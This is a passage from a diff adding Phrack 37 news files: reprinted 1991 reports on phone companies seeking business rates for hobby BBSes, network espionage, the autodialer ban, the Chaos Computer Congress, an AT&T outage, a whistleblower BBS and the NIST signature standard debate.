+rate administration in Missouri.
+
+A "business nature" could be said to be present if the line is advertised in
+any way, he said.
+
+But the nature of the growth of bulletin boards has been that computer owners
+added modems to personal computers in the home and began communicating with
+others by computer, using residential line, the sysops say.  Most always have
+thought of bulletin boards as a hobby, they say.  Though there may be some
+charges for access to bulletin boards, nobody makes any money at it, they said.
+
+Bailey said that the phone company does not know how many sysops there are
+using residential lines and the company has no formal plan to try to determine
+how lines are being used.
+
+Bailey attended a meeting in Kansas City that also was attended by John Van
+Eschen, assistant manager for telecommunications for the Missouri Public
+Service Commission, and about 150 sysops.
+
+The meeting was described later as being "testy" at times and the outcome was
+that the sysops and the phone company agreed to disagree.  Users contended that
+bulletin boards are a public service offering information and that rate
+increases could force some to shut down.
+
+"The users want to be billed as residential", Van Eschen said.  "An avenue
+toward getting that would be to file a formal complaint against Bell.  That
+could lead to written testimony and a hearing."
+
+He said there is a complaint on file now charging that Bell wanted to change
+user's rate from residential to business and there was talk at the meeting
+about some sort of legal action.
+
+Van Eschen said the PSC is continuing to study the question and has made no
+recommendation.  The effective date for application of a ruling would be
+December. 15.
+
+Some sysops, Harre among them, suggest that the phone company might be
+interested in reducing the number of bulletin boards because the company has
+plans to enter the information services business itself and may see bulletin
+boards as potential competitors.  The Supreme Court recently upheld a ruling
+that allowed the Baby Bell companies to enter information services.
+
+Bailey said he was not aware of what the company plans to do in the information
+services business.
+_______________________________________________________________________________
+
+ Phone Companies Eyeing Higher Rates for BBSes                November 18, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Steve Higgins (PC Week)(Page 173)
+
+The shoestring bulletin-board service could be a thing of the past if the major
+telephone companies have their way.
+
+Regional operating companies such as U.S. West Inc., Southwestern Bell Corp.
+and Southern Bell Telephone & Telegraph Co. are maneuvering to raise the cost
+of doing business for the more than 40,000 operators of dial-in bulletin boards
+in the United States, those operators say.
+
+The bulletin board services (BBSs), whose offerings run the gamut from
+technical support to discussions on exotic birds, could be crippled or killed
+off completely by higher installation costs and monthly line charges that, in
+some cases, would double the current rates.
+
+"If the telephone companies were to raise the operating costs, we would have to
+pass that on to users," said Kevin Beherens, operator of Aquilla BBS, a
+distributor of shareware in Aurora, Ill.
+
+While attempts to up the ante have thus far been rebuked by overwhelming
+opposition from BBS users, a proposal by Southwestern Bell that could make it
+easier for the company to crack down on BBS operators who are paying low,
+residential phone-line rates is up for review this month.
+
+"We have a tariff for business customers.  Bulletin-board service operators
+should be paying that rate," said David Martin, a spokesman for Southwestern
+Bell in St. Louis.  "We don't now have an organized program to move bulletin-
+board providers to that rate."
+
+The companies region covers five states in the Midwest and the southern United
+States, but the proposal would take effect only in Missouri.  If approved by
+Missouri regulators, it could more than double the monthly rate for operators
+of bulletin-board systems.
+
+Business data-line rates average $18 to $45 per month nationally, while
+residential rates average $7 to $20 per month.
+
+In addition, a federal judge's ruling in October that frees the telephone
+companies to operate their own bulletin-board services could make price hikes
+even more tempting.  Because of the federal ruling, analysts say, the phone
+companies' interest in raising costs for BBS operators extends beyond
+extracting more revenue.
+
+"The phone companies want to put up electronic Yellow Pages...[which] in itself
+[is] not a bad thing," said Jack Rickard, editor of Boardwatch, a monthly
+magazine for BBS users that is published in Lakewood, Colorado.  "But the
+mentality seems to be to stop anything else."
+
+COMPETITORS ABOUND
+
+Should they unveil their own on-line services, the phone companies will find a
+prodigious installed base with which to compete.  In addition to the garage BBS
+operations, nearly 40 of the top 100 PC software companies are exploiting the
+low expense and wide reach of bulletin boards to provide customer support,
+according to Soft*letter, an industry newsletter based in Watertown,
+Massachusetts.
+
+"We are just now starting to see business use bulletin-board services," said
+Jim Harrer, president and CEO of Mustang Software Inc., a vendor of
+communications software and a bulletin-board service operator located in
+Bakersfield, Calif.  "It would cripple them if [tariffs] got in the way."
+
+If that becomes the case, observers say, some system operators might try to
+dodge the new tariff by disguising their operations as personal telephone
+lines.  In fact, some operators are reportedly trying that tactic already.
+
+"I've heard of one guy who was who was trying to convince the phone company
+that he has five kids" who needed separate phone lines, Mustang Software's
+Harrer said.
+
+Increased costs could also affect the large bulletin-board operators, such as
+Prodigy Services Co. and CompuServe Inc., particularly if coupled with the
+emergence of bulletin boards maintained by telephone companies.
+
+"It is not going to push them out of business," said Boardwatch's Rickard, "but
+[Prodigy and CompuServe] are also affected."
+_______________________________________________________________________________
+
+ Southwestern Bell's Scorched Earth Policy For Bulletin Boards    December 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from BOARDWATCH Magazine
+
+Throughout the debate on whether to allow the Regional Bell Operating Companies
+(RBOC) into the information business, opponents warned that the RBOC would use
+their monopoly position to unfairly eliminate competition.  And throughout this
+debate, the RBOC piously denied they would ever do anything anti-competitive.
+Judge Greene warned in clear and ringing terms that their history indicated
+they would and denied them repeatedly the freedom to compete in information
+services over the course of the seven years since divestiture.
+
+Using millions in rate-payers funds, the RBOC lobbied and appealed through
+every venue in government and finally found an appeals court who directed Judge
+Greene to reconsider his stand.
+
+Forced to lift the ban on information content, Greene issued a stay on his
+ruling pending appeals by the opposition.  In an October 7 decision by the
+appeals court, even the stay was overturned freeing the bells over night to
+operate their own online services.
+
+The ink had not completely dried on the document when they levied their opening
+shot.  Southwestern Bell Telephone, with a history of BBS harassment going back
+to the mid-80s already under their belt, was the first out of the gate.  In
+October, they filed a tariff revision asking that ALL electronic bulletin
+boards, whether operated for profit or as a hobby, be classified as Information
+Terminal Services and not only forced to pay higher business rates, but
+specifically prevented from using existing business measured service tariffs to
+reduce their telephone bills.  The tariff was filed October 7, 1991 as a
+proposed revision to Missouri Local Exchange Tariff, P.S.C. Mo. No. 24 and
+P.S.C. Mo. No. 35, General Exchange Tariff, Section 17, Rules and Regulations
+Applying to all Customer's Contracts.
+
+Currently, the basic line charge for businesses in the Kansas City area is
+$33.55 monthly--about twice the residential rate.  And the Information Terminal
+Rate is actually higher yet at $43.60 monthly.  While the tariff modification
+is specifically aimed at BBS operators, the wording of the tariff would seem to
+include anyone who uses a modem or fax machine on a telephone line.
+
+Southwestern Bell has a history of animosity with regards to bulletin board
+operations.  The company announced their own SOURCELINE gateway data service in
+Houston in 1988 and delivered letters to hundreds of Houston bulletin boards in
+October of that year demanding they pay business rates for their residential
+telephone lines.  A group of local system operators operating under the banner
+of COSUARD took their case to the Texas Public Utilities Commission, charging
+predatory practices, anti-competitive actions, and discrimination against the
+hobby BBS community.
+
+Southwestern Bell, concurrent with the grandiose failure of their own
+SOURCELINE gateway service, settled with the group in January 1991.  All BBS in
+the Houston area operating on three or fewer lines and not seeking subscriber
+support are classified as hobby BBS and continue to qualify for residential
+telephone service.
+
+Hobby bulletin boards are really the issue.  Most commercial or subscription
+bulletin board systems already pay business telephone rates for their systems.
+However, most opt for a type of business classification referred to as "totally
+measured service."   Virtually all RBOC offer a reduced basic rate in exchange
+for the right to meter local calls -- usually at two or three cents per minute.
+Since most bulletin boards make few outbound calls -- most of the activity is
+incoming--the totally measured service, even in a business classification, is
+only a few dollars more than residential telephone service.  SWB in their
+filing, if approved, would effectively double the telephone charges for any BBS
+in the state of Missouri overnight.
+
+Kansas City system operators have banded together to form a non-profit
+organization titled the Greater Kansas City Sysops Association (GKCSA) to fight
+the proposed change.  At a November 14th public hearing in Kansas City, nearly
+150 operators and callers showed up to protest the action and the MPSC agreed
+to delay implementation of the new rate until December 15th.  SWB had
+originally sought to apply the rates effective November 15.
+
+According to GKCSA attorney Robin Martinez, the group will be filing a legal
+petition asking the MPSC to rule that all hobby BBS operating on residential
+premises be allowed the lower residential rate classification.  The GKCSA
+contends in its petition that Southwestern Bell Telephone is acting in a
+predatory and anti-competitive manner in seeking to eliminate any perceived
+competition to their own planned information services in Missouri.
+
+GKCSA president Scott Lent predicts that if Southwestern Bell gets their way,
+it will be the end of the free hobby BBS in the state -- which is just what the
+telephone company wants.  And he predicts that if SWB wins in Missouri, the
+other RBOC won't be far behind with tariffs of their own to eliminate the
+competition of underpriced information services represented by the free BBSs.
+
+William Bailey, company district manager of rate administration for Missouri,
+makes no apologies for the company's approach.  At the Kansas City meeting he
+admitted that the charge will have no significant impact on company revenues,
+but denied that it was in any way connected to their entry into information
+services and avowed that he wasn't informed what the company's plans were in
+information services.  He claimed their only goal was "fairness" in that modem
+users tied up the system longer than voice callers and should pay more.  He
+could not comment on the coincidence of SWB filing for the tariff within a week
+of the appeals court decision.
+_______________________________________________________________________________
+
+ Computer Phone-Fee Plan Angers Many                           December 8, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Christine Bertelson (St. Louis Post-Dispatch)
+
+               "Costs May Triple For Electronic Bulletin Boards"
+
+For Barbara Clements, the electronic bulletin board she operates on her home
+computer in south St. Louis County is far more than a hobby.  It is her only
+window on the world.
+
+Clements, 43, has severe cerebral palsy, which prevents her from walking or
+using her hands.  Her garbled speech is difficult for many people to understand
+in public and impossible to comprehend on the telephone, she says.
+
+But by sitting at the keyboard and using a head wand, Clements is able to use
+her modem and computer to communicate with a growing network of other computer
+hobbyists.
+
+The computer network has given her a freedom and social life she is loath to
+lose.
+
+"Six years ago, before I got my modem, I was a total hermit," Clements said in
+an interview at her home.
+
+"My privately run bulletin board system is strictly social for my sanity.  I am
+an equal human being on any bulletin board system because people cannot see my
+disability and they cannot hear my garbled speech.  This makes it easier to
+make friends."
+
+Clements is one of hundreds of computer hobbyists statewide who would be
+affected by a proposal by Southwestern Bell Corp. to charge bulletin board
+operators business rates instead of residential rates for telephone hookups to
+their terminals.
+
+The proposal would affect not only disabled people such as Clements who see the
+network as a lifeline to the outside world.
+
+The bulletin boards have become increasingly popular with computer hobbyists in
+the general population as well - as a way to exchanging information about
+computers and various other interests.
+
+Those involved from teen-age "computer hackers" to adults trading recipes to
+singles looking for dates.
+
+Hundreds of electronic bulletin boards have been added to the network across
+Missouri the past few years.  In the St. Louis area, more than 200 are in
+place.  Only operators of the boards would be affected by the proposed rate
+boost; hundreds of others who phone into them would not be covered.
+
+The company announced the plan several weeks ago.  The issue is expected to
+soon be before the Missouri Public Service Commission, which regulates utility
+rates in the state.
+
+The telephone company says it is only trying to price its services fairly,
+noting that computer chitchat often lasts longer than telephone calls.  Tying
+up telephone lines increases Bell's operating costs, a spokesman said.
+
+Robin Martinez, a lawyer from Kansas City representing computer hobbyists
+there, said he plans to file a complaint this week, calling for a public
+hearing on the issue.
+
+William Bailey, Southwestern Bell's district manager of rate administration for
+Missouri, said the company considers electronic bulletin boards operated by
+people such as Clements as businesses.
+
+"If a customer acts as a business, by advertising and other things, we could
+charge a business rate," Bailey said.  "We charge business rates to clubs and
+fraternities.  One reason we price businesses higher is to keep residential
+rates lower."
+
+Electronic bulletin boards, frequently operated from homes, function as a
+meeting place, their operators say.
+
+Many are free to use, and operators often get no income from them.
+
+Each has its on name, reflecting the personality of its "sysop" or system
+operators.  Clements dubbed hers, appropriately, "Barb's Outlook Window."
+
+One of Clements' electronic acquaintances is John Brawley Jr. of Eureka, known
+by his computer handle "The Wanderer."
+
+The two met three months ago on her bulletin board and now regularly talk by
+computer about subjects from the weather to Clement's cerebral palsy to
+Brawley's ideas on the impact of quantum mechanics on religious concepts.
+
+Brawley is concerned that Bell's proposal would effectively gag Clements.  But,
+he said, there is a broader issue involved also.  Charging the higher rates
+would restrict the free flow of information, he said.
+
+Bailey said the principle at stake is not freedom of speech, but merely the
+definition of what is a business and what is not.
+
+The U.S. Supreme Court recently cleared the way for regional telephone
+companies, including Southwestern Bell, to provide information services that
+could eventually compete with electronic bulletin boards, newspapers and data
+base operators.
+
+Revenue for telephone-delivered information in the nation was estimated at $750
+million last year and projected at $2 billion next year, industry sources said.
+
+Martinez, the lawyer for the Kansas City bulletin users, estimated that
+Southwestern Bell could take in $8 million more a year by charging the business
+rates in question.  Bailey would not confirm that figure.
+
+Once computer hobbyists file a formal complaint with the state commission, Bell
+would have 30 days to respond.  If the issue is not resolved privately, the
+commission may hold a public hearing, said agency spokesman Kevin Kelly.
+
+In the meantime, Clements said she has written to the company and is eager to
+testify at a hearing.
+_______________________________________________________________________________
+
+ Agreement Nears For Phone Company And Missouri BBS Sysops    February 14, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from Newsbytes
+
+The report from Kansas City is that Southwestern Bell phone company is nearing
+an agreement with local operators of computer bulletin board systems in dispute
+over the company's charging BBSes business rates.  The pact seems to center on
+language in a new tariff plan.
+
+Communications Daily newsletter this week quoted attorney Robin Martinez,
+representing the sysops, as saying the proposed agreement calls for BBSes to be
+exempt from business rates if they meet certain conditions.
+
+One of the conditions is that the boards must be located in residences.
+Exempted BBSes also must not charge for access, must not advertise and must
+have fewer than five phone lines.
+
+Martinez says the last stumbling block in the agreement is coming up with a
+workable definition for "BBS" for the tariff language.
+_______________________________________________________________________________
+
+ Final Notes
+ ~~~~~~~~~~~
+There are still some problems to be worked out in the Missouri/Southwestern
+Bell situation, but meanwhile, there are other similar problems going on
+with C&P (Bell Atlantic) Telephone in Virginia and US West Telephone in
+Oregon.
+
+Our electronic rights and freedoms that we have enjoyed for oh so many years
+are in jeopardy because of the greed of the Regional Bell Operating Companies.
+
+Support our Congress by supporting S 2112 and HR 3515!
+
+More details in Phrack 38.
diff --git a/phrack37/14.txt b/phrack37/14.txt
new file mode 100644
index 0000000..e7d0e68
--- /dev/null
+++ b/phrack37/14.txt
@@ -0,0 +1,554 @@
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN       Issue XXXVII / Part Four of Four      PWN
+              PWN                                             PWN
+              PWN     Compiled by Dispater & Spirit Walker    PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ Computer Espionage:  Can We Be Compromised By The Internet?      December 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Extracted from Security Awareness Bulletin
+
+The advent of computer networks linking scientists and their research
+institutions vastly complicates any effort to identify Soviet scientific
+espionage.  For example, foreign travel may become less important, as computers
+become more directly interconnected, allowing scientists anywhere in the world
+to talk to each other -- and, in some cases to access information in data bases
+at Western academic and defense-related institutions.
+
+This capability has been available for some time, but in 1989 the USSR took an
+important step toward increasing the breadth and availability of access, by
+applying (with Poland, Czechoslovakia, Hungary, and Bulgaria) to be connected
+to the European Academic Research Network (EARN).  Approval of the application
+in April 1990 provided Soviet and East European users access far beyond simply
+a link to computers throughout Western Europe.  Through EARN, the Soviets would
+be connected to Internet, a US network serving defense, research, and academic
+organizations worldwide.
+
+A number of threats are inherent in the trend toward computer linkage.  The
+most obvious is the increased ease with which a Soviet can discuss professional
+matters with Westerners working on similar projects.  A user also can put out a
+blanket request for information on any subject, and it may not always be
+obvious that the requestor is working for the USSR.  In addition, the Soviet
+Academy of Sciences can use a computer network to issue general invitations to
+conferences -- in hopes that the responses will identify untapped research
+institutions or individual scientists that later can be targeted for specific
+information.
+
+Access to data in the computers connected to a network normally is controlled,
+so that specific files can be read only by authorized users.  However, the
+Soviets have demonstrated that an innovative "hacker" connected to computers
+containing sensitive information can evade the access controls in order to read
+that information.  In the "Hannover Hacker" case, for example, the Soviet
+intelligence services used West German computer experts to access US restricted
+data bases, obtaining both software and defense-related information.
+_______________________________________________________________________________
+
+ Waging War Against War Dialing                               November 27, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Edmund L. Andrews (New York Times)
+ Special Thanks: Dark Overlord
+
+WASHINGTON -- Riding a wave of popular annoyance over telephone sales calls,
+Congress approved and sent to President Bush a bill that would ban the use of
+automated dialing devices that deliver pre-recorded messages to the home.  The
+measure would also allow consumers to block calls from human sales-people by
+placing their names on a "do not call" list.
+
+The bill, which passed on voice votes in both the House and Senate, was
+supported by both Democrats and Republicans, some of whom have recounted their
+own aggravations with unsolicited sales calls.
+
+Although the White House has expressed concerns about what it views as
+unnecessary regulation, the President has not threatened to veto the bill.
+
+The measure, which combines provisions from several separate measures passed
+previously by both chambers of Congress, bans the use of autodialers for
+calling most individual homes.  The few exceptions would be when a person has
+explicitly agreed to receive such a call or when the autodialer is being used
+to notify people of an emergency.
+
+When autodialers are used to call businesses, they would be prohibited from
+reaching more than two numbers at a single business.
+
+Many states have already passed laws that restrict autodialers, including about
+a dozen states that ban them altogether and about two dozen others that
+restrict their use in various ways.
+
+The state laws, however, do not stop a company from using an autodialer in an
+unregulated state to call homes in state with regulations.
+
+In an attempt to curb telemarketing by human sales representatives, the measure
+would instruct the Federal Communications Commission to either oversee the
+creation of a nationwide "do not call" list or issue rules ordering companies
+to maintain their own lists.
+
+The bill would allow people who placed their names on such a list to file suits
+is small claims courts against companies that persisted in calling.  The suits
+could seek up to $500 for each unwanted call, up to a maximum of three calls
+>from a single company.
+
+Finally, the bill would ban unsolicited "junk fax" messages, which are
+advertisements transmitted to facsimile machines.
+
+"This is a victory for beleaguered consumers, who in this piece of legislation
+have their declaration of independence from junk faxes and junk calls," said
+Rep.  Edward J. Markey, D-Mass., the measure's principal sponsor in the House.
+
+Companies that make or use autodialers glumly predicted that the measure would
+put them out of business and would hurt small advertisers the most.
+
+"I think it will put us out of business," said Mark Anderson, owner of the
+Leshoppe Corp., a New Orleans concern that uses about 160 machines for clients
+who sell everything from tanning products to health insurance.  "What people
+don't understand is that a lot of mom-and-pop operations use electronic
+marketing, and use it successfully."
+
+Ray Kolker, president of Kolker Systems, the largest maker of autodialers,
+echoed those views.  "Passage of this bill demonstrates that Congress just
+isn't as concerned about the economy as they think they are," he said.  "This
+will destroy a multibillion-dollar business."
+
+Telemarketing has surged in recent years, as the cost of long-distance
+telephone service has plunged and as consumers have become deluged by floods of
+catalogues they do not read and envelopes they do not open.
+
+According to congressional estimates, the volume of goods and services sold
+through all forms of telephone marketing has increased from about $72 billion
+in 1982 to $435 billion in 1990.  Over all, an estimated 300,000 people are
+employed in some facet of telephone marketing.
+
+Autodialers, which can each make about 1,500 calls a day, have become one of
+the most efficient but disliked forms of telemarketing.  By one estimate,
+20,000 autodialers are in operation at one time, with the capacity of making
+more than 20 million calls in a single day.
+
+During hearings on the issue earlier this year, Sen. Daniel K. Inouye,
+D-Hawaii, noted irritably that he had been summoned to the telephone only to
+hear a recorded sales message about winning a trip to Hawaii.
+
+The legislation was not opposed by all companies involved in telephone sales.
+Many marketing experts have long deplored the use of autodialers as a sales
+tool, arguing that they are counter-productive because they generate more
+irritation than sales interest.
+
+The Direct Marketing Association, a trade group, has expressed cautious support
+for the legislation and already maintains its own, voluntary "do not call"
+list.
+
+Beyond simply annoying people at home, the autodialers have been known to tie
+up telephone paging networks and the switchboards of hospitals and
+universities, and to call people on their cellular telephones.
+
+But it remains unclear how effective the "do not call" lists would be in
+practice, because the two options available to the FCC differ greatly.
+
+A national list maintained by the government would effectively protect
+consumers from all unwanted sales calls.  But a requirement that each company
+maintain its own list would be much more limited, because people might have to
+call each company to be placed on its individual list.
+
+Congressional aides noted that the measure passed Wednesday strongly implied
+that the FCC should set up its own list, because it provides two pages of
+detail on just how such a list should be created.
+_______________________________________________________________________________
+
+ Foreign Guests Learn America Is Land Of The Free              December 2, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Excerpted from the Orlando Sentinel
+
+                       "Merry Christmas From BellSouth!"
+
+A telephone computer glitch gave dozens of foreign travelers at downtown
+Orlando hotel early Christmas presents Saturday and Sunday.
+
+The giving began when a guest at the Plantation Manor, an international youth
+hotel across from Lake Eola, discovered that pay phones were allowing free
+long-distance calls to virtually anywhere in the world.
+
+As the news spread, the four public phones, which are normally deserted at the
+hotel, were busy non-stop until Sunday afternoon,when Southern Bell discovered
+the problem and dispatched technicians to shut off long-distance service.
+
+Roger Swain, a clerk at Plantation Manor, said the discovery was made by
+accident.
+
+"One of our guests said he tried to call Houston, Texas, from the second
+floor," Swain said.  The operator told him he didn't need to use coins because
+the phone was not listed as a public phone.  He was on the phone for 40
+minutes, and they didn't charge him.'
+
+A spokesman for AT&T, which handles long distance for some of Southern Bell's
+phones, said the problem seemed to be with a Southern Bell computer.
+
+"Our equipment is working fine," said Randy Berridge, AT&T spokesman.  "If it's
+a Southern Bell problem, they would bear the costs.'
+
+It's possible Southern Bell recouped some money:  It still cost 25 cents for a
+local call.
+
+"This is a drop in the ocean to them," one English traveler said of the phone
+company, which had just covered the cost of his call home at the Sunday rate of
+$21.74 for each half hour."
+_______________________________________________________________________________
+
+ 8th Chaos Computer Congress                               December 27-29, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Klaus Brunnstein
+
+ Special Thanks: Terra of CCC
+
+On occasion of the 10th anniversary of its foundation, Chaos Computer Club
+(CCC) organized its 8th Congress in Hamburg.  To more than 400 participants
+(largest participation ever, with growing number of students rather than
+teen-age scholars), a rich diversity of PC and network related themes was
+offered, with significantly less sessions than before devoted to critical
+themes, such as phreaking, hacking or malware construction.  Changes in the
+European hacker scene became evident as only few people from Netherlands
+(e.g. Hack-Tic) and Italy had come to this former hackers' Mecca.
+
+Consequently, Congress news are only documented in German.  As CCC's founding
+members develop in age and experience, reflection of CCC's role and growing
+diversity of opinions indicates that teen-age CCC may produce less spectacular
+events than ever before.
+
+This year's dominating theme covered presentations of communication techniques
+for PCs, Ataris, Amigas and Unix, the development of a local net as well as
+description of regional and international networks, including a survey.  In
+comparison, CCC '90 documents are more detailed on architectures while sessions
+and demonstrations in CCC '91 (in "Hacker Center" and other rooms) were more
+concerned with practical navigation in such nets.
+
+Phreaking was covered by the Dutch group HACK-TIC which updated its CCC '90
+presentation of how to "minimize expenditures for telephone conversations" by
+using blue boxes and red boxes, and describing available software and recent
+events.  Detailed information on phreaking methods in specific countries and
+bugs in some telecom systems were discussed.  More information (in Dutch) was
+available, including charts of electronic circuits, in several volumes of Dutch
+"HACKTIC:  Tidschrift voor Techno-Anarchisten" (news for techno-anarchists).
+
+Remark #1:  Recent events (e.g. "Gulf hacks") and material presented  on Chaos
+            Congress '91 indicate that the Netherlands emerges as a new
+            European center of malicious attacks on systems and networks.
+
+            Among other potentially harmful information, HACKTIC #14/15
+            publishes code of computer viruses (a BAT-virus which does not work
+            properly.
+
+Remark #2:  While few Netherland universities devote research and teaching to
+            security, Delft university at least offers introductory courses
+            into data protection.
+
+Different from recent years, a seminar on Computer viruses (presented by Morton
+Swimmer of Virus Test Center, University of Hamburg) as deliberately devoted to
+disseminate non-destructive information (avoiding any presentation of virus
+programming).  A survey of legal aspects of inadequate software quality
+(including viruses and program errors) was presented by lawyer Freiherr von
+Gravenreuth.
+
+Some public attention was drawn to the fact that the "city-call" telephone
+system radio-transmits information essentially as ASCII.  A demonstration
+proved that such transmitted texts may easily be intercepted, analyzed and
+even manipulated on a PC.  CCC publicly warned that "profiles" of such texts
+(and those addressed) may easily be collected, and asked Telecom to inform
+users about this insecurity; German Telecom did not follow this advice.
+
+Besides discussions of emerging voice mailboxes, an interesting session
+presented a C64-based chipcard analysis systems.  Two students have built a
+simple mechanism to analyze (from systematic IO analysis) the protocol of a 
+
+German telephone card communicating with the public telephone box;  they
+described, in some detail (including an electronmicroscopic photo) the
+architecture and the system behavior, including 100 bytes of communication
+data stored in a central German Telecom computer.  Asked for legal implications
+of their work, they argued that they just wanted to understand this technology,
+and they were not aware of any legal constraint.  They have not analyzed
+possibilities to reload the telephone account (which is generally possible,
+due to the architecture), and they did not analyze architectures or procedures
+of other chipcards (bank cards etc).
+
+Following CCC's (10-year old charter), essential discussions were devoted to
+social themes.  The "Feminine computer handling" workshop deliberately
+excluded men (about 25 women participating), to avoid last year's experience
+of male dominance in related discussions.  A session (mainly attended by
+informatics students) was devoted to "Informatics and Ethics", introducing the
+international state-of-discussion, and discussing the value of professional
+standards in the German case.
+
+A discussion about "techno-terrorism" became somewhat symptomatic for CCC's
+actual state.  While external participants (von Gravenreuth, Brunnstein)
+were invited to this theme, CCC-internal controversies presented the panel
+discussion under the technical title "definition questions".  While one
+fraction wanted to discuss possibilities, examples and dangers of techno-
+terrorism openly, others (CCC "ol'man" Wau Holland) wanted to generally define
+"terrorism" somehow academically, and some undertook to describe "government
+repression" as some sort of terrorism.  In the controversial debate, a few
+examples of technoterrorism (WANK worm, development of virus techniques for
+economic competition and warfare) were given.
+_______________________________________________________________________________
+
+ Another AT&T 800-Number Outage                               December 16, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Dana Blankenhorn (Newsbytes)
+
+BASKING RIDGE, NEW JERSEY -- AT&T suffered another embarrassing outage on its
+toll-free "800" number lines over the weekend, right in the middle of the
+Christmas catalog shopping season.
+
+Andrew Myers, an AT&T spokesman, said the problem hit at 7:20 PM on December 13
+as technicians loaded new software into computers in Alabama, Georgia, and New
+York.  The software identifies and transfers 800 calls, he said.  A total of
+1.8 million calls originating in parts of the eastern U.S. were impacted, the
+company said.
+
+Service was restored after about one hour when technicians "backed off" the
+patch and went back to using the old software.  Programmers are now working on
+the software, trying to stamp out the bugs before it's reloaded.  "Obviously we
+don't like it when a single call doesn't get through, but I wouldn't consider
+this a serious problem," Myers said.  The problem was reported to the Federal
+Communications Commission over the weekend, and to the press the next day.
+
+The latest problem continues a disturbing trend of AT&T service outages in the
+Northeast.  Worse, all the problems have had different causes -- power
+problems, switch software problems, and cable cuts caused previous outages.
+_______________________________________________________________________________
+
+ US Congress Sets Up BBS For Whistle Blowers                  December 16, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Dana Blankenhorn (Newsbytes)
+
+WASHINGTON, D.C. -- U.S. Congressman Bob Wise and his House Government
+Operations subcommittee on government information, justice and agriculture have
+opened a bulletin board service for government whistle-blowers.
+
+Wise himself is the system operator, or sysop, of the new board.  Newsbytes
+contacted the board and found it accepts parameters of 8 bit words, no parity,
+and 1 stop bit, known as 8-N-1 in the trade, and will take calls from a
+standard 2400 bit/second Hayes- compatible modem.
+
+Whistle-blowers are employees who tell investigators about wrong- doing at
+their companies or agencies, or "blow the whistle" on wrong-doing.  Wise said
+that pseudonyms will be accepted on the BBS -- most private systems demand
+real names so as to avoid infiltration by computer crackers or other abusive
+users.  Passwords will keep other users from reading return messages from the
+subcommittee, Wise added.  The committee will check the board daily and get
+back to callers about their charges.  The board is using RBBS software, a
+"freeware" package available without license fee.
+
+The executive branch of the U.S. government uses a system of inspectors
+general to police its offices, most of whom have telephone hotlines for
+whistle-blowers and accept mail as well.  But the inspectors expect whistle-
+blowers to collect evidence at work, which could get them in trouble.  And
+efforts to contact the whistle-blower by an inspector general representative
+can identify them to wrongdoers.  Theoretically, calls from Congressional
+staffers will be seen by the bad guys as typical annoying oversight calls.
+
+Press Contact:  Rep. Bob Wise
+                202-224-3121
+                202-225-5527 BBS
+_______________________________________________________________________________
+
+ NIST Extends Review Deadline for Digital Signature           December 16, 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By John McCormick (Newsbytes)
+
+WASHINGTON, DC -- NIST, the National Institute of Standards and Technology
+(formerly the Bureau of Standards) has taken the unusual step of extending the
+review period for the controversial digital signature standard which the agency
+proposed at the end of August.
+
+The normal 90-day comment period would already have ended, but the NIST has
+extended that deadline until the end of February - some say because the agency
+wishes to tighten the standard.
+
+NIST spokespersons deny that there was any need to modify the proposed standard
+to increase its level of security, but James Bidzos, whose RSA Data Security
+markets a rival standard, says that the NIST's ElGamal algorithm is too weak
+and is being promoted by the government because the National Security Agency
+feels that it can easily break the code when necessary.
+
+The new standard is not a way of encrypting messages themselves; that is
+covered by the existing DES or Data Encryption Standard.  Rather, the DSS or
+Digital Signature Standard is the method used to verify the "signature" of the
+person sending the message, i.e., to make certain that the message, which
+might be an order to transfer money or some other important item, is really
+>from the person who is authorized to send such instructions.
+
+As Newsbytes reported back in July, the NSA and NIS had been charged with
+developing a security system nearly four years ago.  The recently announced
+ElGamal algorithm was previously due to be released last fall, and in the
+meantime the RSA encryption scheme has become quite popular.
+
+At that time, NIST's deputy director, Raymond G. Kammer, told the Technology
+and Competitiveness Subcommittee of the House (U.S. House of Representatives)
+Science, Space and Technology Committee that the ElGamal encryption scheme,
+patented by the federal government, was chosen because it would save federal
+agencies money over the private RSA encryption and signature verification
+scheme.
+
+Interestingly enough, the only company that currently markets an ElGamal DS
+system is Information Security Corp., 1141 Lake Cook Rd., Ste. D, Deerfield,
+IL  60015, a company that fought and won a bitter court battle with RSA over
+the right to market RSA-based encryption software to the federal government.
+That was possible because RSA was developed at MIT by mathematicians working
+under federal grants.
+
+ISC's $249.95 Secret Agent, which uses the ElGamal algorithm, was released at
+last year's Federal Office Systems Expo in Washington. ElGamal is a public key
+system that can be used just like the RSA system but differs from it in
+significant theoretical ways.
+
+ISC's CEO and president, Thomas J. Venn, has told Newsbytes that the ElGamal
+system is highly secure, but the ElGamal algorithm is quite different from
+that of the RSA system, deriving its security from the difficulty of computing
+discrete logarithms, in finite field, instead of using RSA's very different
+method of factoring the products of two prime numbers.
+
+RSA has fought back by posting a prize for anyone who can crack the RSA scheme.
+To take a stab at it, send a self-addressed stamped envelope to RSA Data
+Security, Inc., 10 Twin Dolphin Dr., Redwood City, CA 94065, for the RSA list
+and the rules. Those with access to Internet e-mail can send a request to
+challenge-info@rsa.com.
+_______________________________________________________________________________
+
+ PWN Quicknotes
+ ~~~~~~~~~~~~~~
